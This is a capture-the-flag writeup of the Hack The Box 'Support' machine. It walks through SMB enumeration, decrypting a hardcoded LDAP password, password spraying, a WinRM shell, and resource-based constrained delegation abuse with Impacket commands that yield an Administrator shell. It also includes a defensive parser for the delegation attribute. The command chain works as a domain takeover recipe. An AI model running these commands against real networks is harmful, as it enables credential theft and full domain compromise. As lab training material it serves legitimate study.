yuyudhn's notes

Support

Writeup Hack The Box Support


Last updated 1 year ago


Port scanning

sudo nmap -sV -sT -sC -oA nmap_initial 10.10.11.174

Output:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-17 21:32 WIB
Nmap scan report for support.htb (10.10.11.174)
Host is up (0.023s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-07-17 14:32:46Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-07-17T14:32:52
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.55 seconds

Enumerate SMB

smbclient -L 10.10.11.174 --no-pass

Then download all files from the support-tools share.

smbclient '//10.10.11.174/support-tools' -N -c 'prompt OFF;recurse ON;mget *'

Now, we will extract the password from UserInfo. There are two options to get the password: static analysis and dynamic analysis.

Dynamic Analysis

Run UserInfo.exe, but first start tcpdump to check whether the app sends any requests.

sudo tcpdump -i tun0
mono UserInfo.exe find -first ''

Check the tcpdump output.

After confirming that UserInfo connects to the server, analyze the traffic with Wireshark.

Got credentials:

support\ldap : nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Static Analysis

Use AvaloniaILSpy to decompile the program.

We found the encrypted password and the key. Use this Python script to decrypt the password.

#! /usr/bin/env python3
import base64

def get_password():
    # Base64-encoded ciphertext and XOR key recovered from the decompiled program
    encoded_string = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
    key = b"armando"

    array = base64.b64decode(encoded_string)
    array2 = bytearray(array)

    # Each ciphertext byte is XORed with the repeating key byte and the constant 0xDF
    for i in range(len(array)):
        array2[i] = (array[i] ^ key[i % len(key)] ^ 0xDF)

    return array2.decode("utf-8")

password = get_password()
print(password)

LDAP Enumeration

Enumerate all information using ldapsearch.

Query all usernames:

ldapsearch -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
-b 'DC=support,DC=htb' "(objectClass=person)" | \
grep "sAMAccountName:" | sed 's/sAMAccountName: //g'

Query all distinguished names:

ldapsearch -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'DC=support,DC=htb' "(objectClass=person)" | grep "dn:"

Enumerate all attributes of the support user's DN.

ldapsearch -H ldap://10.10.11.174 -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "CN=support,CN=Users,DC=support,DC=htb"

We found a credential in the support user's info attribute.

Found creds:

Ironside47pleasure40Watchful

Next, spray the password against the other accounts.

crackmapexec winrm 10.10.11.174 -u users.txt -p 'Ironside47pleasure40Watchful' --continue-on-success

Get Low User

evil-winrm -i support.htb -u support -p Ironside47pleasure40Watchful

Privilege Escalation

After googling, I found useful articles here:

  • https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation

  • https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/resource-based-constrained-delegation-ad-computer-object-take-over-and-privilged-code-execution

  • https://learn.microsoft.com/en-us/windows-server/security/kerberos/kerberos-constrained-delegation-overview

  • https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd

First, we need to add a computer to the domain with Impacket.

impacket-addcomputer 'support.htb/support:Ironside47pleasure40Watchful' -computer-name 'ayanami' -computer-pass 'ayanami'

Then, import PowerView on target system.

Import-Module .\PowerView.ps1
Get-DomainComputer
Get-DomainComputer ayanami

Now, edit the target's "rbcd" attribute: read it first, then write the new entry.

impacket-rbcd -delegate-to 'DC$' -dc-ip 10.10.11.174 -action 'read' 'support.htb/support:Ironside47pleasure40Watchful'
impacket-rbcd -delegate-from 'ayanami$' -delegate-to 'DC$' -dc-ip 10.10.11.174 -action 'write' 'support.htb/support:Ironside47pleasure40Watchful'

Now, obtain a ticket (delegation operation).

impacket-getST -spn 'cifs/dc.support.htb' -impersonate Administrator -dc-ip 10.10.11.174 'support.htb/ayanami$:ayanami'

Get shell as Administrator.

KRB5CCNAME=administrator.ccache impacket-psexec -dc-ip 10.10.11.174 -no-pass -k support.htb/administrator@dc.support.htb
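The write step above leaves a trace that a defender can audit: the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute is a self-relative NT security descriptor whose DACL names the accounts allowed to delegate to it. The following is an added example, not code from this writeup or from Impacket; it parses such a descriptor and lists the ACE SIDs, and the sample SID it builds is constructed (build_sd is a hypothetical helper that only exists to create offline test input).

```python
#!/usr/bin/env python3
"""Parse an msDS-AllowedToActOnBehalfOfOtherIdentity value (a self-relative
NT security descriptor) and list the SIDs granted in its DACL."""
import struct

def sid_to_str(buf, off):
    """Decode a binary SID at buf[off:], return (string form, size in bytes)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")   # 6-byte big-endian
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)   # 4-byte little-endian each
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs)), 8 + 4 * count

def dacl_sids(sd):
    """Return [(ace_type, access_mask, sid)] for every ACE in the descriptor's DACL."""
    # SECURITY_DESCRIPTOR header: Revision, Sbz1, Control, Owner, Group, Sacl, Dacl offsets
    _rev, _sbz, control, _own, _grp, _sacl, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if not (control & 0x0004) or dacl_off == 0:   # SE_DACL_PRESENT not set: nobody delegates
        return []
    # ACL header: AclRevision, Sbz1, AclSize, AceCount, Sbz2
    _arev, _asbz, _asize, ace_count, _asbz2 = struct.unpack_from("<BBHHH", sd, dacl_off)
    pos, out = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHI", sd, pos)
        sid, _ = sid_to_str(sd, pos + 8)        # SID follows the 8-byte ACE header
        out.append((ace_type, mask, sid))
        pos += ace_size                          # AceSize lets us skip unknown ACE types
    return out

def build_sd(sids):
    """Hypothetical helper: build a minimal SD granting full control to each SID (test input)."""
    aces = b""
    for s in sids:
        parts = [int(p) for p in s.split("-")[1:]]
        rev, auth, subs = parts[0], parts[1], parts[2:]
        sid = struct.pack("<BB", rev, len(subs)) + auth.to_bytes(6, "big") \
            + struct.pack("<%dI" % len(subs), *subs)
        # ACCESS_ALLOWED_ACE (type 0) with a full-control mask
        aces += struct.pack("<BBHI", 0x00, 0x00, 8 + len(sid), 0x000F01FF) + sid
    acl = struct.pack("<BBHHH", 4, 0, 8 + len(aces), len(sids), 0) + aces
    # Control 0x8004 = SE_SELF_RELATIVE | SE_DACL_PRESENT; DACL starts right after the 20-byte header
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + acl

if __name__ == "__main__":
    # Constructed SID standing in for a newly added computer account
    sample = build_sd(["S-1-5-21-1111111111-2222222222-3333333333-5101"])
    for ace_type, mask, sid in dacl_sids(sample):
        print("ACE type=%d mask=0x%08X sid=%s" % (ace_type, mask, sid))
```

In a real audit the descriptor bytes come from an LDAP read of the computer object, and any SID listed that is not an expected service account is worth investigating.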

Tools Used

Tools used in this machine.

  • ldapsearch
  • AvaloniaILSpy: https://github.com/icsharpcode/AvaloniaILSpy
  • evil-winrm: https://github.com/Hackplayers/evil-winrm
  • CrackMapExec: https://github.com/Porchetta-Industries/CrackMapExec
  • Impacket: https://github.com/fortra/impacket
  • PowerView: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1